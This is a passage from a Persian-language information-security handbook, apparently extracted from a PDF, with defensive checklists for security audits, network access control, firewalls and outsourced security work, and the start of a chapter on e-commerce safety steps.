‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﺭﻭﻱ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪ‬
‫ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﻧﺼﺐ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﻭﺻﻠﻪ ﻫﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﺁﻳـــﺎ ﻧـــﺮﻡﺍﻓـــﺰﺍﺭ ﻣﻤﻴـــﺰﻱ ﺭﻭﻱ ﺗﻤــﺎﻡ ﺳﻴـــﺴﺘﻤﻬﺎﻱ‬
‫ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺎ ﺷﻤﺎﺳـﺖ‬
‫ﺑﺮﺍﻱ ﺷﻜﺴﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﻛـﻪ ﺑـﻪ ﺳـﺎﺩﮔﻲ ﻗﺎﺑـﻞ‬
‫ﺣﺪﺱ ﻫﺴﺘﻨﺪ ﺗﻼﺵ ﻣﻲﻛﻨﻴﺪ؟ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﺩﺭ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﻭﺭﻭﺩ ﺷﺒﻜﻪ ﻧﺼﺐ‬
‫ﺷﺪﻩ ﺍﺳﺖ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎ‪ ،‬ﺗﺠﺮﺑﻴـﺎﺕ ﻧﻔـﻮﺫ ﺑـﻪﺍﺷـﺘﺮﺍﻙ‬
‫ﮔﺬﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﺁﻳﺎ ﻣﺮﺍﻗﺐ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﻫﺴﺘﻴﺪ؟ ﻫﺮ ﭼﻨـﺪ‬
‫ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫•‬
‫ﺁﻳﺎ ﻫﻨﮕﺎﻡ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﺟﻮﺍﻧـﺐ ﺍﺣﺘﻴـﺎﻁ ﺭﺍ‬
‫ﺭﻋﺎﻳﺖ ﻣﻲﻛﻨﻴﺪ؟‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ‬
‫•‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗﺄﻳﻴـﺪ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺧﺎﺭﺟﻲ ﺩﺧﻴﻞ ﺍﺳﺖ؟‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺷﺒﻜﻪﻫﺎﻱ ﺧـﺎﺭﺟﻲ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬
‫‪١٩٢‬‬
‫ﺁﺗﺶ‬
‫•‬
‫ﺁﻳﺎ ﻛﺴﻲ ﺍﺗﺼﺎﻻﺕ ﺑﻪ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺩﻧﺒﺎﻝ ﻣﻲﻛﻨﺪ؟‬
‫•‬
‫•‬
‫ﺁﻳﺎ ﻧﻘﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺭﻭﺷـﻨﻲ ﺗﻌﺮﻳـﻒ‬
‫ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺯ ﺗﻌﺪﺍﺩ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻧﻲ ﻛﻪ ﻣﺘـﺼﻞ‬
‫ﺑﻪ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻣﻄﻠﻌﻨﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺷﺒﻜﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﻓـﺮﺩﻱ ﺑـﺼﻮﺭﺕ ﻣـﻨﻈﻢ ﺗﻨﻈﻴﻤـﺎﺕ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺭﺍ‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﻛﻨﺪ؟ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫•‬
‫ﺁﻳﺎ ﭘﻴﺶ ﺍﺯ ﺗﺄﻳﻴﺪ ﺍﺗﺼﺎﻻﺕ ﺧﺎﺭﺟﻲ‪ ،‬ﻧﻴﺎﺯ ﻭﺍﻗﻌﻲ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؟‬
‫‪ ۱۹۱‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﻫﺸﺘﻢ‪ ،‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ‪ ،‬ﺹ ‪۱۲۱‬‬
‫‪ ۱۹۲‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﻓﺼﻞ ﻫﻔﺘﻢ‪ ،‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻣﻨﻴﺖ‪ ،‬ﺹ ‪۱۰۹‬‬
‫‪193 Penetration Testing‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻌﻴﻦ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫‪٢٠٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺁﻳﺎ ﺷﺮﻛﺖ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺍﺗـﺼﺎﻻﺕ ﺧـﺎﺭﺟﻲ ﺑـﺼﻮﺭﺕ‬
‫ﻣﻨﻈﻢ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﻛﻨﺪ؟‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺭﻭﺍﻟﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ‬
‫‪١٩٤‬‬
‫•‬
‫ﺁﻳﺎ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲ ﺑﺮﺍﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺩﺍﺭﻳﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺍﺗـﺼﺎﻝ ﺍﻓـﺮﺍﺩ ﻳـﺎ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ‬
‫ﻣﺴﺘﻌﻔﻲ‪ ،‬ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻣﻨﻴﺖ‪ ،‬ﺭﻭﺍﻟﻬـﺎﻱ ﻛﺘﺒـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻬﻴـﻪ‬
‫ﻛﺮﺩﻩﺍﻳﺪ؟‬
‫•‬
‫ﺁﻳــﺎ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ‪ ،‬ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ‬
‫ﻣﺨﺼﻮﺹ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻃﺒﻖ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺭﺳﻨﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺧﺎﺭﺟﻲ ﺳﻴﺎﺳﺖ ﻭ ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﻭﻱ ﻫﻤﺔ ﺍﻧـﻮﺍﻉ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ‬
‫ﺷﻤﺎ )‪ (Unix/Linux, Mac, Windows‬ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ؟‬
‫•‬
‫ﺁﻳــﺎ ﻫﻤــﺔ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺍﺗــﺼﺎﻻﺕ‬
‫ﺑﺼﻮﺭﺕ ﺍﺟﺒﺎﺭﻱ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﻧﺪ؟‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺧﺮﻳـﺪ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺎﺯﺑﻴﻨﻲ‪ ،‬ﺑﻮﺩﺟـﺔ‬
‫ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑﺎ ﻓـﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﺍﻣﻜـﺎﻥ ﺁﻣـﻮﺯﺵ ﺻـﺤﻴﺢ‬
‫ﻣﻤﻴﺰﺍﻥ‪ ،‬ﺍﺯ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴـﺖ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻨﺎﺳـﺐ‬
‫ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﻧﺪ؟‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺖ‬
‫ﺩﺭ ﻋﻴﻦ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻘـﺎﺩﻳﺮ ﻫﻨﮕﻔﺘـﻲ ﺯﻣـﺎﻥ ﻭ ﭘـﻮﻝ ﺭﺍ‬
‫ﺟﻬﺖ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻣﻮﺯﺵ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ‬
‫ﺗﻮﺟــﻪ ﺑــﻪ ﻣــﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺍﻣﻨﻴﺘــﻲ ﺻــﺮﻑ ﻣــﻲﻛﻨــﺪ‪،‬‬
‫ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻴﺰ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺮﻧﺎﻣﺔ ﺟـﺎﻣﻊ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻛﻪ ﺑﺎ ﺭﺷﺪ ﻭ ﺗﻐﻴﻴﺮ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﺳﺎﺯﻣﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ‬
‫ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ ﻧﻤﻲﺗﻮﺍﻧﺴﺘﻪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺭﺍ ﺁﺷـﻜﺎﺭ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻣﺰﻳﺖ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺑـﻪ ﻫﻤـﺮﺍﻩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺍﮔـﺮ ﻣﺘﺨﻠﻔـﺎﻥ ﺑﺪﺍﻧﻨـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ‬
‫ﺟﺴﺘﺠﻮﻱ ﺁﻧﺎﻥ ﻫﺴﺘﻴﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻓﻌﺎﻟﻴـﺖ ﺧـﻮﺩ ﺭﺍ ﻣﺤـﺪﻭﺩ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﻣﻌﻤﻮﻝﺗﺮﻳﻦ ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﺑﺎ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻤﻴـﺰﻱ ﺍﻣﻨﻴـﺖ ﻗﺎﺑـﻞ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻧﺼﺐ ﻧﺒﻮﺩﻥ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛‬
‫ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎ؛‬
‫ﺳﺎﺩﻩ ﻭ ﻗﺎﺑﻞ ﺣﺪﺱ ﺑﻮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ؛‬
‫ﻓﻌﺎﻝ ﺑﻮﺩﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻏﻴﺮﺿﺮﻭﺭﻱ؛ ﻭ‬
‫ﺭﻭﺷﻦ ﻧﺒﻮﺩﻥ ﻳﺎ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﺗﻌﻴﻴﻦ ﻳﻚ ﻣﺒﻨﺎ ﺑﺮﺍﻱ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ‪ -‬ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺮﻛﺖ ﻭ ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ‬
‫ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ‪ -‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ‬
‫ﻧﻬﺎﻳﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﺍﻣﺮ ﻭﺍﻗﻔﻴﻢ ﻛﻪ ﭘﻴﭽﻴﺪﮔﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧﺎﺭﺟﻲ ﻭﺍﺩﺍﺭ ﻛﻨﺪ‪ .‬ﺩﺭ ﻓﺼﻠﻲ ﻛﻪ ﺑﻪ ﺍﻳـﻦ‬
‫ﻣﻔﻬﻮﻡ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﻜﺎﺕ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺩﺭ‬
‫ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻫﻤﻜﺎﺭ‪ ،‬ﭼﮕـﻮﻧﮕﻲ ﻣـﺪﻳﺮﻳﺖ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺁﻥ‪ ،‬ﻭ‬
‫ﺍﻳﻨﻜﻪ ﭼﻪ ﻫﻨﮕﺎﻡ ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﻧﺮﺍ ﺑﻪ ﺩﻗﺖ ﺯﻳـﺮ ﻧﻈـﺮ ﮔﺮﻓـﺖ‬
‫ﺑﺤﺚ ﻋﻤﻴﻘﻲ ﺻﻮﺭﺕ ﮔﺮﻓﺖ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺖ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﻨﺒـﻊ ﺩﻳﮕـﺮ ﺑـﺮﺍﻱ‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﻳﻚ ﭘﻴﻤﺎﻧﻜـﺎﺭ ﺧـﺎﺭﺟﻲ ﺟﻬـﺖ ﺍﻧﺠـﺎﻡ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪:‬‬
‫ﻓﻬﺮﺳــﺖ ﻛﻨﺘــﺮﻝ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨــﺎﺑﻊ ﺧــﺎﺭﺟﻲ ﺩﺭ‬
‫ﺍﻣﻨﻴﺖ‪) ١٩٥‬ﻣﻼﺣﻈﺎﺕ ﻓﻨﻲ(‬
‫•‬
‫ﺁﻳﺎ ﺍﺗﺼﺎﻻﺕ ﻣﻴﺎﻥ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ )ﺍﺗـﺼﺎﻻﺕ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ( ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺑﺎﺯﺑﻴﻨﻲ ﻣـﻲﺷـﻮﺩ؟ ﻫـﺮ‬
‫ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬
‫‪ ۱۹۴‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﻧﻬﻢ‪ ،‬ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ‪ ،‬ﺹ ‪۱۳۳‬‬
‫‪ ۱۹۵‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﻧﻬﻢ‪ ،‬ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ‪ ،‬ﺹ ‪۱۳۳‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫•‬
‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻪ ﺷﺒﻜﺔ ﺷﻤﺎ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ‪ ،‬ﻳﻚ ﻣﻌﻤﺎﺭﻱ ﺭﺳﻤﻲ ﻭﺟﻮﺩ‬
‫ﺩﺍﺭﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲ ﺑـﺮﺍﻱ ﺗﻌﻴـﻴﻦ ﺍﻳﻨﻜـﻪ ﺍﺗـﺼﺎﻝ ﺍﺯ‬
‫ﺷﺒﻜﺔ ﺧﺎﺭﺟﻲ ﺩﺭ ﭼﻪ ﺯﻣﺎﻧﻲ‪ ،‬ﺗﺤﺖ ﭼﻪ ﺷـﺮﺍﻳﻄﻲ‪ ،‬ﻭ ﺑـﻪ‬
‫ﭼﻪ ﺻﻮﺭﺗﻲ ﻣﺠﺎﺯ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﺁﻏﺎﺯ ﺷﺪﻥ ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﺯ ﺷﺒﻜﻪ ﺧﺎﺭﺟﻲ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻳﻴﺪ‬
‫ﻣﺪﻳﺮﻳﺖ ﺩﺍﺭﺩ؟‬
‫•‬
‫ﺁﻳﺎ ﭘﻴﺶ ﺍﺯ ﺍﺗﺼﺎﻝ ﻳﻚ ﺷـﺒﻜﺔ ﺧـﺎﺭﺟﻲ‪ ،‬ﺍﻧﺠـﺎﻡ ﻧـﻮﻋﻲ‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﺭﺳﻤﻲ ﺍﻟﺰﺍﻣﻲ ﺍﺳﺖ؟‬
‫‪٢٠٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪٢٠٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ﺩﻭﺍﺯﺩﻫﻢ‬
‫ﻗﻮﺍﻋﺪ ﺍﻳﻤﻨﻲ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺑﺮﺍﻱ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ‬
‫ﭼﻬﺎﺭ ﮔﺎﻡ ﺁﺳﺎﻥ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ ﺍﻣﻦﺗﺮ‬
‫‪.۱‬‬
‫ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ‬
‫ﻭﺍﺟﺪ ﭼﻪ ﺩﺭﺟﻪﺍﻱ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﻓﻜـﺮ‬
‫ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ ﻭ‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺩﭼﺎﺭ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ‬
‫ﺧﻮﺍﻫﻴﺪ ﺷﺪ‪ ،‬ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻭﻟﻮﻳـﺖ ﻛـﺎﻓﻲ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑـﺮﻭﺯ ﻣـﺸﻜﻼﺕ‬
‫ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ ﭘﺮﻛـﺎﺭ ﻛـﻪ ﻫـﻴﭻ ﺁﻣـﻮﺯﺵ‬
‫ﺭﺳﻤﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﻧﺪﻳﺪﻩ ﺍﺳﺘﻔﺎﺩﺓ ﭘﺎﺭﻩﻭﻗـﺖ ﻛﻨﻴـﺪ‪،‬‬
‫ﺑﺪﻭﻥ ﺷﻚ ﺑﻪ ﺍﺳﺘﻘﺒﺎﻝ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻓﺘﻪﺍﻳﺪ‪.‬‬
‫‪.۲‬‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﺁﻣﻮﺯﺵ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺭﻭﺍﻟﻬـﺎ‬
‫ﺩﺧﺎﻟﺖ ﺩﻫﻴﺪ‪ .‬ﺁﻳـﺎ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ )ﻭ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻋﻤﻠﻜﺮﺩﻫـﺎﻳﻲ ﺍﺯ ﻧﻈـﺮ‬
